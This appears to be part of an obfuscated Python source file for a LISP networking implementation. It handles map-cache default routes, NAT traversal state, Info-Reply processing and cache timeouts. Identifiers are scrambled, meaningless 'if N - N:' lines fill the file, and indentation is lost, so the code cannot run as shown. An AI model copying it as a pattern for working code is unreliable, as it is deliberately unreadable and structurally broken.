if 46 - 46: OOooOOo - I11i * iIii1I11I1II1 - I1Ii111 % i11iIiiIii
if 32 - 32: Oo0Ooo * i1IIi . iII111i . iII111i
if 77 - 77: OOooOOo
if 74 - 74: O0
O000 = lisp_address ( oO0oO00 , "" , 0 , iid )
O000 . make_default_route ( O000 )
OoOoooooO00oo = lisp_map_cache . lookup_cache ( O000 , True )
if ( OoOoooooO00oo ) :
if ( OoOoooooO00oo . checkpoint_entry ) :
lprint ( "Updating checkpoint entry for {}" . format ( green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) ) )
if 86 - 86: OoOoOO00
elif ( OoOoooooO00oo . do_rloc_sets_match ( rtr_list . values ( ) ) ) :
continue
if 4 - 4: OoooooooOO * OoO0O00
OoOoooooO00oo . delete_cache ( )
if 93 - 93: OoO0O00 - I1Ii111 - OoO0O00
if 1 - 1: o0oOOo0O0Ooo . oO0o * i11iIiiIii * IiII - OoO0O00 - OoooooooOO
IIi1I1Ii . append ( [ O000 , "" ] )
if 29 - 29: iIii1I11I1II1 + OoO0O00 * II111iiii * Ii1I * iII111i . O0
if 6 - 6: I1IiiI - OoOoOO00
if 63 - 63: OOooOOo - oO0o * I1IiiI
if 60 - 60: II111iiii - Oo0Ooo
oOoooOOO0o0 = lisp_address ( oO0oO00 , "" , 0 , iid )
oOoooOOO0o0 . make_default_multicast_route ( oOoooOOO0o0 )
iII11iIi = lisp_map_cache . lookup_cache ( oOoooOOO0o0 , True )
if ( iII11iIi ) : iII11iIi = iII11iIi . source_cache . lookup_cache ( O000 , True )
if ( iII11iIi ) : iII11iIi . delete_cache ( )
if 94 - 94: i1IIi * O0 * Oo0Ooo . Oo0Ooo
IIi1I1Ii . append ( [ O000 , oOoooOOO0o0 ] )
if 27 - 27: Oo0Ooo
if ( len ( IIi1I1Ii ) == 0 ) : return
if 94 - 94: i1IIi * ooOoO0o / I1IiiI
if 7 - 7: Oo0Ooo - iIii1I11I1II1 / I1ii11iIi11i * I1IiiI + Ii1I
if 99 - 99: i11iIiiIii - I1ii11iIi11i
if 64 - 64: IiII . OoOoOO00 . Oo0Ooo . I1Ii111 / I11i / Ii1I
iio0OOoO0 = [ ]
for O0O0 in rtr_list :
Oo0O000OOOO0 = rtr_list [ O0O0 ]
IiIIIi = lisp_rloc ( )
IiIIIi . rloc . copy_address ( Oo0O000OOOO0 )
IiIIIi . priority = 254
IiIIIi . mpriority = 255
IiIIIi . rloc_name = "RTR"
iio0OOoO0 . append ( IiIIIi )
if 63 - 63: i11iIiiIii / iII111i / o0oOOo0O0Ooo
if 77 - 77: OoooooooOO % iIii1I11I1II1 - OOooOOo / OoOoOO00
for O000 in IIi1I1Ii :
OoOoooooO00oo = lisp_mapping ( O000 [ 0 ] , O000 [ 1 ] , iio0OOoO0 )
OoOoooooO00oo . mapping_source = map_resolver
OoOoooooO00oo . map_cache_ttl = LISP_MR_TTL * 60
OoOoooooO00oo . add_cache ( )
lprint ( "Add {} to map-cache with RTR RLOC-set: {}" . format ( green ( OoOoooooO00oo . print_eid_tuple ( ) , False ) , rtr_list . keys ( ) ) )
if 36 - 36: i1IIi / OoOoOO00 * II111iiii - Oo0Ooo . i1IIi
iio0OOoO0 = copy . deepcopy ( iio0OOoO0 )
if 78 - 78: i11iIiiIii
return
if 20 - 20: Ii1I
if 100 - 100: OoooooooOO . I1Ii111
if 32 - 32: iIii1I11I1II1 . iIii1I11I1II1 % II111iiii / Oo0Ooo . iIii1I11I1II1 . O0
if 63 - 63: I1IiiI . iIii1I11I1II1 . Oo0Ooo % OOooOOo - iII111i + ooOoO0o
if 64 - 64: o0oOOo0O0Ooo / Ii1I % I1Ii111 % iII111i + OOooOOo * IiII
if 87 - 87: I1ii11iIi11i . i1IIi - I11i + OoOoOO00 . O0
if 37 - 37: IiII
if 65 - 65: ooOoO0o * Ii1I / I1IiiI . i1IIi % ooOoO0o . OoooooooOO
if 17 - 17: ooOoO0o / OoO0O00 / I1IiiI / OOooOOo % IiII
if 88 - 88: i1IIi - OoOoOO00
def lisp_process_info_reply ( source , packet , store ) :
if 66 - 66: OoooooooOO - OoooooooOO * I11i / II111iiii + oO0o / Ii1I
if 7 - 7: Ii1I / iIii1I11I1II1
if 36 - 36: iIii1I11I1II1 % i11iIiiIii
if 35 - 35: Oo0Ooo + I1IiiI - O0 - I1Ii111
ii1iII111i = lisp_info ( )
packet = ii1iII111i . decode ( packet )
if ( packet == None ) : return ( [ None , None , False ] )
if 64 - 64: i1IIi * OoOoOO00 / II111iiii * oO0o
ii1iII111i . print_info ( )
if 35 - 35: i1IIi - Ii1I - Ii1I . O0 % iII111i * iII111i
if 15 - 15: OoooooooOO . Ii1I * I1Ii111 . ooOoO0o % OoO0O00 * Oo0Ooo
if 10 - 10: iII111i + i11iIiiIii . OOooOOo % iII111i - i1IIi
if 10 - 10: iIii1I11I1II1 * i11iIiiIii - O0
IIIII1IIi11 = False
for O0O0 in ii1iII111i . rtr_list :
oOo0O = O0O0 . print_address_no_iid ( )
if ( lisp_rtr_list . has_key ( oOo0O ) ) :
if ( lisp_register_all_rtrs == False ) : continue
if ( lisp_rtr_list [ oOo0O ] != None ) : continue
if 81 - 81: I1Ii111 . I1IiiI + O0 * oO0o * Oo0Ooo * iIii1I11I1II1
IIIII1IIi11 = True
lisp_rtr_list [ oOo0O ] = O0O0
if 88 - 88: ooOoO0o * Ii1I + II111iiii - OoO0O00 % Oo0Ooo
if 94 - 94: i11iIiiIii * I1ii11iIi11i / OoOoOO00 + i1IIi
if 37 - 37: OOooOOo + O0 - OoOoOO00 + OoO0O00
if 13 - 13: i11iIiiIii * oO0o
if 41 - 41: ooOoO0o
if ( lisp_i_am_itr and IIIII1IIi11 ) :
if ( lisp_iid_to_interface == { } ) :
lisp_update_default_routes ( source , lisp_default_iid , lisp_rtr_list )
else :
for oOo00Ooo0o0 in lisp_iid_to_interface . keys ( ) :
lisp_update_default_routes ( source , int ( oOo00Ooo0o0 ) , lisp_rtr_list )
if 89 - 89: i11iIiiIii . i11iIiiIii . IiII
if 29 - 29: o0oOOo0O0Ooo * iIii1I11I1II1 . iIii1I11I1II1
if 32 - 32: IiII - OoOoOO00
if 88 - 88: OOooOOo - II111iiii + i1IIi * Oo0Ooo
if 48 - 48: I1Ii111 + IiII % iII111i * iII111i + I1Ii111
if 83 - 83: OoO0O00 . I11i * I1ii11iIi11i - II111iiii
if 41 - 41: OoooooooOO . OoOoOO00 * iIii1I11I1II1
if ( store == False ) :
return ( [ ii1iII111i . global_etr_rloc , ii1iII111i . etr_port , IIIII1IIi11 ] )
if 18 - 18: IiII / I1Ii111 % i1IIi * i11iIiiIii
if 16 - 16: Oo0Ooo
if 24 - 24: o0oOOo0O0Ooo . OoOoOO00
if 50 - 50: I1ii11iIi11i / iIii1I11I1II1 - Oo0Ooo - i11iIiiIii % o0oOOo0O0Ooo - ooOoO0o
if 92 - 92: OoooooooOO - I1ii11iIi11i . I11i / O0 % iII111i
if 96 - 96: I1IiiI . oO0o % O0
for o00o0oOo0o0O in lisp_db_list :
for IiIIIi in o00o0oOo0o0O . rloc_set :
OooO0ooO0o0OO = IiIIIi . rloc
I1i = IiIIIi . interface
if ( I1i == None ) :
if ( OooO0ooO0o0OO . is_null ( ) ) : continue
if ( OooO0ooO0o0OO . is_local ( ) == False ) : continue
if ( ii1iII111i . private_etr_rloc . is_null ( ) == False and
OooO0ooO0o0OO . is_exact_match ( ii1iII111i . private_etr_rloc ) == False ) :
continue
if 19 - 19: iIii1I11I1II1 + I1Ii111 / OoooooooOO % OOooOOo - i1IIi + I11i
elif ( ii1iII111i . private_etr_rloc . is_dist_name ( ) ) :
Ooo000oo0OO0 = ii1iII111i . private_etr_rloc . address
if ( Ooo000oo0OO0 != IiIIIi . rloc_name ) : continue
if 87 - 87: OoooooooOO
if 97 - 97: ooOoO0o * IiII / iIii1I11I1II1
iiI1Ii1I = green ( o00o0oOo0o0O . eid . print_prefix ( ) , False )
ii11IiI = red ( OooO0ooO0o0OO . print_address_no_iid ( ) , False )
if 65 - 65: i1IIi - i11iIiiIii + oO0o % I1IiiI - OoO0O00 % ooOoO0o
IIOoOO = ii1iII111i . global_etr_rloc . is_exact_match ( OooO0ooO0o0OO )
if ( IiIIIi . translated_port == 0 and IIOoOO ) :
lprint ( "No NAT for {} ({}), EID-prefix {}" . format ( ii11IiI ,
I1i , iiI1Ii1I ) )
continue
if 94 - 94: i11iIiiIii * i11iIiiIii * I1ii11iIi11i
if 72 - 72: o0oOOo0O0Ooo * i11iIiiIii - OOooOOo
if 68 - 68: iII111i + I1ii11iIi11i / II111iiii * I1ii11iIi11i
if 45 - 45: II111iiii . iII111i
if 55 - 55: ooOoO0o / iII111i / O0
ooO0ooO0oO = ii1iII111i . global_etr_rloc
OOOoIII1I = IiIIIi . translated_rloc
if ( OOOoIII1I . is_exact_match ( ooO0ooO0oO ) and
ii1iII111i . etr_port == IiIIIi . translated_port ) : continue
if 85 - 85: o0oOOo0O0Ooo * IiII
lprint ( "Store translation {}:{} for {} ({}), EID-prefix {}" . format ( red ( ii1iII111i . global_etr_rloc . print_address_no_iid ( ) , False ) ,
# OoooooooOO + i11iIiiIii
ii1iII111i . etr_port , ii11IiI , I1i , iiI1Ii1I ) )
if 24 - 24: iII111i
IiIIIi . store_translated_rloc ( ii1iII111i . global_etr_rloc ,
ii1iII111i . etr_port )
if 31 - 31: OOooOOo . iIii1I11I1II1 - oO0o
if 36 - 36: O0
return ( [ ii1iII111i . global_etr_rloc , ii1iII111i . etr_port , IIIII1IIi11 ] )
if 30 - 30: i11iIiiIii * Oo0Ooo . IiII
if 65 - 65: oO0o * IiII * OOooOOo / OoooooooOO % I11i / I1Ii111
if 21 - 21: i1IIi * iII111i + OoO0O00
if 27 - 27: I11i / oO0o . iII111i + o0oOOo0O0Ooo - OOooOOo
if 85 - 85: OoooooooOO
if 83 - 83: iII111i * I11i . OOooOOo - OoO0O00 % IiII
if 8 - 8: I1Ii111
if 86 - 86: ooOoO0o + iII111i * O0 % OoO0O00 + OoOoOO00
def lisp_test_mr ( lisp_sockets , port ) :
return
lprint ( "Test Map-Resolvers" )
if 49 - 49: OOooOOo / i1IIi - II111iiii . iIii1I11I1II1 + I11i . OOooOOo
I111o0oooO00o0 = lisp_address ( LISP_AFI_IPV4 , "" , 0 , 0 )
iiI111I = lisp_address ( LISP_AFI_IPV6 , "" , 0 , 0 )
if 37 - 37: i11iIiiIii + O0 + II111iiii
if 13 - 13: OOooOOo / O0
if 19 - 19: iIii1I11I1II1 + IiII * I11i * II111iiii + o0oOOo0O0Ooo + i11iIiiIii
if 69 - 69: iIii1I11I1II1 . II111iiii
I111o0oooO00o0 . store_address ( "10.0.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , I111o0oooO00o0 , None )
I111o0oooO00o0 . store_address ( "192.168.0.1" )
lisp_send_map_request ( lisp_sockets , port , None , I111o0oooO00o0 , None )
if 36 - 36: I1IiiI * i1IIi + OoOoOO00
if 63 - 63: OoOoOO00 - iII111i
if 83 - 83: i1IIi / iII111i % ooOoO0o % i11iIiiIii + I1ii11iIi11i
if 82 - 82: iIii1I11I1II1 / OOooOOo
iiI111I . store_address ( "0100::1" )
lisp_send_map_request ( lisp_sockets , port , None , iiI111I , None )
iiI111I . store_address ( "8000::1" )
lisp_send_map_request ( lisp_sockets , port , None , iiI111I , None )
if 7 - 7: OoooooooOO
if 71 - 71: OOooOOo * Oo0Ooo . Oo0Ooo % iIii1I11I1II1
if 56 - 56: IiII * iIii1I11I1II1 - iIii1I11I1II1 . O0
if 56 - 56: I1Ii111 / iIii1I11I1II1 % IiII * iIii1I11I1II1 . I1ii11iIi11i . OOooOOo
I1OoO0OO = threading . Timer ( LISP_TEST_MR_INTERVAL , lisp_test_mr ,
[ lisp_sockets , port ] )
I1OoO0OO . start ( )
return
if 20 - 20: OoO0O00 / I1ii11iIi11i / iII111i / o0oOOo0O0Ooo
if 37 - 37: o0oOOo0O0Ooo - ooOoO0o + OoOoOO00
if 50 - 50: I1IiiI
if 30 - 30: i1IIi + II111iiii . Oo0Ooo + iIii1I11I1II1
if 54 - 54: o0oOOo0O0Ooo / i11iIiiIii - I11i - oO0o
if 16 - 16: I1ii11iIi11i / OoO0O00
if 2 - 2: i11iIiiIii . iII111i
if 35 - 35: Ii1I
if 54 - 54: OOooOOo
if 83 - 83: i1IIi / II111iiii - I1IiiI + I1ii11iIi11i . IiII * oO0o
if 92 - 92: OoOoOO00 + oO0o % Ii1I / Ii1I - iII111i
if 11 - 11: Oo0Ooo % II111iiii * Ii1I + II111iiii
if 9 - 9: I1Ii111
def lisp_update_local_rloc ( rloc ) :
if ( rloc . interface == None ) : return
if 69 - 69: i1IIi + ooOoO0o + Ii1I
O0o00o000oO = lisp_get_interface_address ( rloc . interface )
if ( O0o00o000oO == None ) : return
if 88 - 88: OoOoOO00 + iII111i % O0 + OOooOOo / OoooooooOO / OOooOOo
O0o00o000 = rloc . rloc . print_address_no_iid ( )
i1iiI11ii1II1 = O0o00o000oO . print_address_no_iid ( )
if 70 - 70: o0oOOo0O0Ooo - O0 % I1ii11iIi11i
if ( O0o00o000 == i1iiI11ii1II1 ) : return
if 28 - 28: I1Ii111 % iII111i
lprint ( "Local interface address changed on {} from {} to {}" . format ( rloc . interface , O0o00o000 , i1iiI11ii1II1 ) )
if 18 - 18: OoOoOO00
if 42 - 42: Ii1I . OOooOOo / O0 / i1IIi . i11iIiiIii
rloc . rloc . copy_address ( O0o00o000oO )
lisp_myrlocs [ 0 ] = O0o00o000oO
return
if 62 - 62: OoOoOO00
if 6 - 6: OoO0O00 * ooOoO0o . oO0o
if 77 - 77: iIii1I11I1II1
if 96 - 96: iII111i * I1ii11iIi11i
if 77 - 77: i11iIiiIii / iIii1I11I1II1 . I1ii11iIi11i
if 90 - 90: I1IiiI + I1IiiI % oO0o
if 95 - 95: OOooOOo + OoooooooOO . i11iIiiIii * OoO0O00 * I1IiiI / I1Ii111
if 5 - 5: Ii1I . oO0o / o0oOOo0O0Ooo - OoooooooOO
def lisp_update_encap_port ( mc ) :
for OooO0ooO0o0OO in mc . rloc_set :
oOOo0O0O = lisp_get_nat_info ( OooO0ooO0o0OO . rloc , OooO0ooO0o0OO . rloc_name )
if ( oOOo0O0O == None ) : continue
if ( OooO0ooO0o0OO . translated_port == oOOo0O0O . port ) : continue
if 67 - 67: I1Ii111 + i1IIi - OOooOOo + OoooooooOO / II111iiii - I1Ii111
lprint ( ( "Encap-port changed from {} to {} for RLOC {}, " + "EID-prefix {}" ) . format ( OooO0ooO0o0OO . translated_port , oOOo0O0O . port ,
# OOooOOo
red ( OooO0ooO0o0OO . rloc . print_address_no_iid ( ) , False ) ,
green ( mc . print_eid_tuple ( ) , False ) ) )
if 55 - 55: I11i
OooO0ooO0o0OO . store_translated_rloc ( OooO0ooO0o0OO . rloc , oOOo0O0O . port )
if 7 - 7: I1Ii111 + ooOoO0o % o0oOOo0O0Ooo
return
if 53 - 53: i1IIi / iII111i % Ii1I % OoooooooOO
if 63 - 63: OOooOOo + I1ii11iIi11i . i1IIi . Ii1I - I1ii11iIi11i * o0oOOo0O0Ooo
if 79 - 79: ooOoO0o - O0
if 20 - 20: OOooOOo
if 22 - 22: iIii1I11I1II1 / I1Ii111
if 6 - 6: iII111i . i11iIiiIii / Oo0Ooo
if 86 - 86: I11i % I1Ii111 % oO0o - ooOoO0o / i1IIi
if 68 - 68: i1IIi % O0 % iII111i
if 55 - 55: I1ii11iIi11i % OOooOOo - o0oOOo0O0Ooo - II111iiii
if 52 - 52: I1Ii111
if 34 - 34: II111iiii + iII111i / IiII
if 47 - 47: OoO0O00
def lisp_timeout_map_cache_entry ( mc , delete_list ) :
if ( mc . map_cache_ttl == None ) :
lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 40 - 40: o0oOOo0O0Ooo / iII111i . o0oOOo0O0Ooo
if 63 - 63: o0oOOo0O0Ooo * iIii1I11I1II1 * II111iiii . OoO0O00 - oO0o / OoOoOO00
iIiooo = lisp_get_timestamp ( )
if 78 - 78: i11iIiiIii / OoO0O00 / i1IIi . i11iIiiIii
if 100 - 100: II111iiii . IiII . I11i
if 60 - 60: OoOoOO00 % OOooOOo * i1IIi
if 3 - 3: OoooooooOO
if 75 - 75: OoooooooOO * I1Ii111 * o0oOOo0O0Ooo + I1ii11iIi11i . iIii1I11I1II1 / O0
if 23 - 23: oO0o - O0 * IiII + i11iIiiIii * Ii1I
if ( mc . last_refresh_time + mc . map_cache_ttl > iIiooo ) :
if ( mc . action == LISP_NO_ACTION ) : lisp_update_encap_port ( mc )
return ( [ True , delete_list ] )
if 8 - 8: ooOoO0o / II111iiii . I1ii11iIi11i * ooOoO0o % oO0o
if 36 - 36: I1ii11iIi11i % OOooOOo - ooOoO0o - I11i + I1IiiI
if 37 - 37: I1ii11iIi11i * IiII
if 65 - 65: OOooOOo / O0 . I1ii11iIi11i % i1IIi % Oo0Ooo
if 36 - 36: i11iIiiIii - OOooOOo + iII111i + iII111i * I11i * oO0o
o0O0oO0 = lisp_print_elapsed ( mc . last_refresh_time )
IiI1ii1 = mc . print_eid_tuple ( )
lprint ( "Map-cache entry for EID-prefix {} has {}, had uptime of {}" . format ( green ( IiI1ii1 , False ) , bold ( "timed out" , False ) , o0O0oO0 ) )
if 14 - 14: O0 - iII111i * I1Ii111 - I1IiiI + IiII
if 46 - 46: OoooooooOO * OoO0O00 . I1Ii111
if 95 - 95: ooOoO0o . I1ii11iIi11i . ooOoO0o / I1IiiI * OoOoOO00 . O0
if 78 - 78: oO0o
if 33 - 33: oO0o + i1IIi
delete_list . append ( mc )
return ( [ True , delete_list ] )
if 32 - 32: iIii1I11I1II1
if 71 - 71: Ii1I * I1IiiI
if 62 - 62: II111iiii / I1IiiI . I1ii11iIi11i
if 49 - 49: IiII / OoOoOO00 / O0 * i11iIiiIii
if 47 - 47: i11iIiiIii + iII111i + i11iIiiIii
if 66 - 66: o0oOOo0O0Ooo . I1IiiI + OoooooooOO . iII111i / OoooooooOO - IiII
if 47 - 47: o0oOOo0O0Ooo / II111iiii * i11iIiiIii * OoO0O00 . iIii1I11I1II1
if 34 - 34: I11i / o0oOOo0O0Ooo * OOooOOo * OOooOOo
def lisp_timeout_map_cache_walk ( mc , parms ) :
ii1111Ii = parms [ 0 ]
oOIIiiI = parms [ 1 ]
if 74 - 74: OoOoOO00 . I1Ii111 - Oo0Ooo / I11i . OoOoOO00 * o0oOOo0O0Ooo
if 43 - 43: I11i
if 18 - 18: OoooooooOO + OoooooooOO - i11iIiiIii / II111iiii
if 41 - 41: Oo0Ooo . OoOoOO00 . iII111i / i11iIiiIii
if ( mc . group . is_null ( ) ) :
iI1i11I1III11 , ii1111Ii = lisp_timeout_map_cache_entry ( mc , ii1111Ii )
if ( ii1111Ii == [ ] or mc != ii1111Ii [ - 1 ] ) :
oOIIiiI = lisp_write_checkpoint_entry ( oOIIiiI , mc )
if 65 - 65: iII111i * o0oOOo0O0Ooo * OoooooooOO + I11i + oO0o % OoO0O00
return ( [ iI1i11I1III11 , parms ] )
if 1 - 1: I1ii11iIi11i . ooOoO0o
if 54 - 54: OoOoOO00 % I1IiiI . ooOoO0o + IiII / i11iIiiIii / o0oOOo0O0Ooo
if ( mc . source_cache == None ) : return ( [ True , parms ] )
if 51 - 51: OoOoOO00 / Ii1I . I1IiiI / Ii1I . II111iiii - iIii1I11I1II1
if 78 - 78: I11i
if 42 - 42: Ii1I
if 50 - 50: iIii1I11I1II1 / Ii1I . ooOoO0o / ooOoO0o * OoOoOO00 * iII111i
if 15 - 15: o0oOOo0O0Ooo % II111iiii + I1IiiI
parms = mc . source_cache . walk_cache ( lisp_timeout_map_cache_entry , parms )
return ( [ True , parms ] )
if 21 - 21: I1ii11iIi11i - ooOoO0o
if 81 - 81: iII111i / i11iIiiIii / I1Ii111
if 70 - 70: I1ii11iIi11i / i11iIiiIii
if 90 - 90: II111iiii / OoOoOO00 . Ii1I . OoooooooOO
if 76 - 76: OoooooooOO
if 78 - 78: IiII % i11iIiiIii
if 23 - 23: iIii1I11I1II1 - o0oOOo0O0Ooo - Ii1I % OOooOOo
def lisp_timeout_map_cache ( lisp_map_cache ) :
oo0OoOO0000 = [ [ ] , [ ] ]
oo0OoOO0000 = lisp_map_cache . walk_cache ( lisp_timeout_map_cache_walk , oo0OoOO0000 )
if 100 - 100: oO0o . OoO0O00 . i11iIiiIii % II111iiii * IiII
if 81 - 81: OOooOOo - OOooOOo + OoOoOO00
if 19 - 19: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 + iIii1I11I1II1 % I1IiiI + ooOoO0o
if 86 - 86: o0oOOo0O0Ooo * i11iIiiIii - I11i
ii1111Ii = oo0OoOO0000 [ 0 ]
for OoOoooooO00oo in ii1111Ii : OoOoooooO00oo . delete_cache ( )
if 71 - 71: OoO0O00 - I11i
if 96 - 96: I1Ii111 / Ii1I
if 65 - 65: I1ii11iIi11i * O0 . IiII
if 11 - 11: I11i / Ii1I % oO0o
oOIIiiI = oo0OoOO0000 [ 1 ]
lisp_checkpoint ( oOIIiiI )
return
if 50 - 50: i11iIiiIii
if 93 - 93: i1IIi / Ii1I * II111iiii - Oo0Ooo . OoOoOO00 - OOooOOo
if 25 - 25: I11i / ooOoO0o % ooOoO0o - OOooOOo
if 59 - 59: I1IiiI + o0oOOo0O0Ooo . iIii1I11I1II1 - O0 - i11iIiiIii
if 4 - 4: I1IiiI
if 36 - 36: Ii1I
if 76 - 76: i11iIiiIii + i1IIi
if 56 - 56: OoOoOO00 + II111iiii / i11iIiiIii * OoOoOO00 * OoooooooOO
if 15 - 15: OoOoOO00 / OoooooooOO + OOooOOo
if 76 - 76: Ii1I * iII111i . OoooooooOO
if 92 - 92: iIii1I11I1II1 - Oo0Ooo - I1IiiI - OOooOOo * I1Ii111
if 44 - 44: I1Ii111 - II111iiii / OOooOOo
if 50 - 50: I11i / I1ii11iIi11i
if 60 - 60: II111iiii / Ii1I + OoO0O00 % I1IiiI * i1IIi / II111iiii
if 91 - 91: I1IiiI * I1Ii111 * i11iIiiIii - oO0o - IiII + I1ii11iIi11i
if 99 - 99: OoO0O00 % o0oOOo0O0Ooo
def lisp_store_nat_info ( hostname , rloc , port ) :
oOo0O = rloc . print_address_no_iid ( )
i11Ii = "{} NAT state for {}, RLOC {}, port {}" . format ( "{}" ,
blue ( hostname , False ) , red ( oOo0O , False ) , port )
if 47 - 47: ooOoO0o . i11iIiiIii / OoO0O00
i1Oo = lisp_nat_info ( oOo0O , hostname , port )
if 45 - 45: OoO0O00 + OoOoOO00 + o0oOOo0O0Ooo
if ( lisp_nat_state_info . has_key ( hostname ) == False ) :
lisp_nat_state_info [ hostname ] = [ i1Oo ]
lprint ( i11Ii . format ( "Store initial" ) )
return ( True )
if 70 - 70: OOooOOo % OoOoOO00
if 86 - 86: OoooooooOO + OOooOOo + OOooOOo + I1Ii111 + OoooooooOO + ooOoO0o
if 84 - 84: OoOoOO00 * OoOoOO00 % ooOoO0o % II111iiii / iII111i + Oo0Ooo
if 95 - 95: iII111i . oO0o % iIii1I11I1II1 - I1IiiI
if 38 - 38: ooOoO0o % iIii1I11I1II1 - OOooOOo
if 13 - 13: OOooOOo . i11iIiiIii
oOOo0O0O = lisp_nat_state_info [ hostname ] [ 0 ]
if ( oOOo0O0O . address == oOo0O and oOOo0O0O . port == port ) :
oOOo0O0O . uptime = lisp_get_timestamp ( )
lprint ( i11Ii . format ( "Refresh existing" ) )
return ( False )
if 71 - 71: oO0o + I1ii11iIi11i * I1ii11iIi11i
if 79 - 79: oO0o
if 47 - 47: OoooooooOO - i1IIi * OOooOOo
if 11 - 11: I11i / OOooOOo . o0oOOo0O0Ooo - O0 * OoooooooOO % iII111i
if 7 - 7: OoOoOO00 . IiII + OoooooooOO - I1Ii111 / oO0o
if 32 - 32: iIii1I11I1II1 + I11i + OOooOOo - OoooooooOO + i11iIiiIii * o0oOOo0O0Ooo
if 8 - 8: iII111i
iI1II1II1i = None
for oOOo0O0O in lisp_nat_state_info [ hostname ] :
if ( oOOo0O0O . address == oOo0O and oOOo0O0O . port == port ) :
iI1II1II1i = oOOo0O0O
break
if 21 - 21: i1IIi + OoO0O00 . I1IiiI - Oo0Ooo
if 99 - 99: OoOoOO00
if 46 - 46: I1ii11iIi11i / II111iiii / OoooooooOO / Ii1I
if ( iI1II1II1i == None ) :
lprint ( i11Ii . format ( "Store new" ) )
else :
lisp_nat_state_info [ hostname ] . remove ( iI1II1II1i )
lprint ( i11Ii . format ( "Use previous" ) )
if 37 - 37: I1ii11iIi11i - Ii1I / oO0o . I1IiiI % I1Ii111
if 8 - 8: oO0o
I1I1ii = lisp_nat_state_info [ hostname ]
lisp_nat_state_info [ hostname ] = [ i1Oo ] + I1I1ii
return ( True )
if 36 - 36: ooOoO0o . Ii1I * ooOoO0o - OoOoOO00
if 20 - 20: ooOoO0o
if 13 - 13: i11iIiiIii + i11iIiiIii
if 21 - 21: OoooooooOO
if 76 - 76: Ii1I . i11iIiiIii * I1IiiI % o0oOOo0O0Ooo * OoO0O00
if 79 - 79: O0 % iIii1I11I1II1 * iII111i - II111iiii % Oo0Ooo + i11iIiiIii
if 36 - 36: OOooOOo / o0oOOo0O0Ooo . OoOoOO00 - I11i
if 89 - 89: i1IIi - iIii1I11I1II1 / II111iiii
def lisp_get_nat_info ( rloc , hostname ) :
if ( lisp_nat_state_info . has_key ( hostname ) == False ) : return ( None )
if 61 - 61: I1Ii111
oOo0O = rloc . print_address_no_iid ( )
for oOOo0O0O in lisp_nat_state_info [ hostname ] :
if ( oOOo0O0O . address == oOo0O ) : return ( oOOo0O0O )
if 56 - 56: I1ii11iIi11i - OoooooooOO
return ( None )
if 52 - 52: Oo0Ooo - I11i - IiII - OoOoOO00
if 21 - 21: oO0o % o0oOOo0O0Ooo + I1Ii111 . OOooOOo / OOooOOo
if 41 - 41: Oo0Ooo . ooOoO0o * oO0o
if 31 - 31: Oo0Ooo * IiII / IiII
if 3 - 3: I1Ii111
if 65 - 65: iIii1I11I1II1 % Oo0Ooo % I11i / OoooooooOO
if 82 - 82: o0oOOo0O0Ooo
if 33 - 33: OoOoOO00 / i11iIiiIii - I1IiiI - OoooooooOO + i1IIi * I1Ii111
if 92 - 92: iII111i + OoO0O00
if 70 - 70: iIii1I11I1II1
if 100 - 100: OOooOOo . oO0o % ooOoO0o * ooOoO0o . I1Ii111 - oO0o
if 33 - 33: Oo0Ooo . i1IIi - OoooooooOO
if 14 - 14: I1Ii111 + Oo0Ooo
if 35 - 35: i11iIiiIii * Ii1I
if 100 - 100: O0 . iII111i / iIii1I11I1II1
if 47 - 47: ooOoO0o + OoOoOO00
if 67 - 67: IiII - I1ii11iIi11i * i1IIi - ooOoO0o
if 91 - 91: I11i
if 54 - 54: I1ii11iIi11i / i1IIi
if 14 - 14: iIii1I11I1II1 * I11i . I11i * ooOoO0o * iII111i
def lisp_build_info_requests ( lisp_sockets , dest , port ) :
if ( lisp_nat_traversal == False ) : return
if 60 - 60: iIii1I11I1II1 + i1IIi + oO0o - iIii1I11I1II1 . i11iIiiIii * OoooooooOO
if 23 - 23: iII111i - IiII % i11iIiiIii
if 81 - 81: OoooooooOO % OoOoOO00 / IiII / OoooooooOO + i1IIi - O0
if 60 - 60: OOooOOo - I1Ii111 * Oo0Ooo
if 9 - 9: OoooooooOO * OOooOOo % OoO0O00 - ooOoO0o + Ii1I
if 39 - 39: iIii1I11I1II1 / i1IIi % I11i % I1ii11iIi11i * IiII
iiiii1 = [ ]
Ii1iiI = [ ]
if ( dest == None ) :
for ii1 in lisp_map_resolvers_list . values ( ) :
Ii1iiI . append ( ii1 . map_resolver )
if 37 - 37: OoooooooOO . o0oOOo0O0Ooo - o0oOOo0O0Ooo - Oo0Ooo / I1IiiI
iiiii1 = Ii1iiI
if ( iiiii1 == [ ] ) :
for Ii1IIII in lisp_map_servers_list . values ( ) :
iiiii1 . append ( Ii1IIII . map_server )
if 87 - 87: IiII
if 68 - 68: I1Ii111 + I1ii11iIi11i * IiII . OoO0O00 / I11i
if ( iiiii1 == [ ] ) : return
else :
iiiii1 . append ( dest )
if 39 - 39: Oo0Ooo + OOooOOo . I1IiiI + OoO0O00 . OoooooooOO
if 31 - 31: OoO0O00
if 55 - 55: OoOoOO00 + I1Ii111 * o0oOOo0O0Ooo - I1ii11iIi11i + OoOoOO00
if 6 - 6: II111iiii % iIii1I11I1II1 * I1Ii111
if 2 - 2: IiII - I1Ii111 . iIii1I11I1II1 - Ii1I * I11i
i1I1i1Iiiiiii = { }
for o00o0oOo0o0O in lisp_db_list :
for IiIIIi in o00o0oOo0o0O . rloc_set :
lisp_update_local_rloc ( IiIIIi )
if ( IiIIIi . rloc . is_null ( ) ) : continue
if ( IiIIIi . interface == None ) : continue
if 58 - 58: i1IIi % iIii1I11I1II1 % i11iIiiIii - o0oOOo0O0Ooo + ooOoO0o
O0o00o000oO = IiIIIi . rloc . print_address_no_iid ( )
if ( O0o00o000oO in i1I1i1Iiiiiii ) : continue
i1I1i1Iiiiiii [ O0o00o000oO ] = IiIIIi . interface
if 23 - 23: Oo0Ooo % Oo0Ooo / IiII
if 63 - 63: I11i % Oo0Ooo * I1Ii111 - Oo0Ooo % i11iIiiIii . II111iiii
if ( i1I1i1Iiiiiii == { } ) :
lprint ( 'Suppress Info-Request, no "interface = <device>" RLOC ' + "found in any database-mappings" )
if 44 - 44: I11i . I1Ii111 . I1ii11iIi11i . oO0o
return
if 1 - 1: I11i % II111iiii / OoO0O00 + OoO0O00
if 46 - 46: Oo0Ooo * Ii1I / IiII % O0 * iII111i
if 74 - 74: OoooooooOO + Ii1I
if 100 - 100: I1IiiI
